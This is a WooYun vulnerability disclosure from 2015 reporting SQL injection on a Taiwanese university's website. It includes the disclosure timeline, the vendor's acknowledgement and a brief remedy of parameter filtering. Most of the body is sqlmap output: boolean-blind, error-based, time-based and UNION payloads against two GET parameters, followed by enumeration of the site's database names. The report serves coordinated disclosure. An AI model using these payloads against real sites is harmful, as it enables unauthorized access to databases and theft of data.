当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159279

漏洞标题:環球科技大学官网sql注射(臺灣地區)

相关厂商:環球科技大學

漏洞作者: 路人甲

提交时间:2015-12-09 13:50

修复时间:2016-01-25 18:01

公开时间:2016-01-25 18:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-09: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-25: 细节向公众公开

简要描述:

環球科技大學官网sql注射

详细说明:

萬事OK在线商城sql注射
注射链接:
http://**.**.**.**/features.php?KindID=10&ID=216
注射参数:
---
Parameter: KindID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: KindID=10' AND 8645=8645 AND 'zqeb'='zqeb&ID=216

漏洞证明:

---
Parameter: KindID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: KindID=10' AND 8645=8645 AND 'zqeb'='zqeb&ID=216
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: KindID=10' AND (SELECT 9923 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9923=9923,1))),0x7162717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uFSR'='uFSR&ID=216
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: KindID=10' AND (SELECT * FROM (SELECT(SLEEP(5)))qqdP) AND 'yoXU'='yoXU&ID=216
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: KindID=-3162' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71787a7671,0x5856515854684b435241,0x7162717171),NULL-- &ID=216
Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: KindID=10&ID=216' AND 4336=4336 AND 'JSMq'='JSMq
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: KindID=10&ID=216' AND (SELECT 1802 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(1802=1802,1))),0x7162717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vCIn'='vCIn
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: KindID=10&ID=216' AND (SELECT * FROM (SELECT(SLEEP(5)))gEhO) AND 'aemF'='aemF
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: KindID=10&ID=-1102' UNION ALL SELECT NULL,CONCAT(0x71787a7671,0x61734177484f4d487778,0x7162717171),NULL,NULL,NULL--
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: KindID, type: Single quoted string (default)
[1] place: GET, parameter: ID, type: Single quoted string
[q] Quit
> 1
[11:50:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0
[11:50:00] [INFO] fetching database names
[11:50:00] [INFO] the SQL query used returns 5 entries
[11:50:01] [INFO] retrieved: information_schema
[11:50:02] [INFO] retrieved: cia
[11:50:02] [INFO] retrieved: mysql
[11:50:03] [INFO] retrieved: test
[11:50:04] [INFO] retrieved: wddseoco_tit
available databases [5]:
[*] cia
[*] information_schema
[*] mysql
[*] test
[*] wddseoco_tit

2.png

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-12-14 03:54

厂商回复:

感謝通報

最新状态:

暂无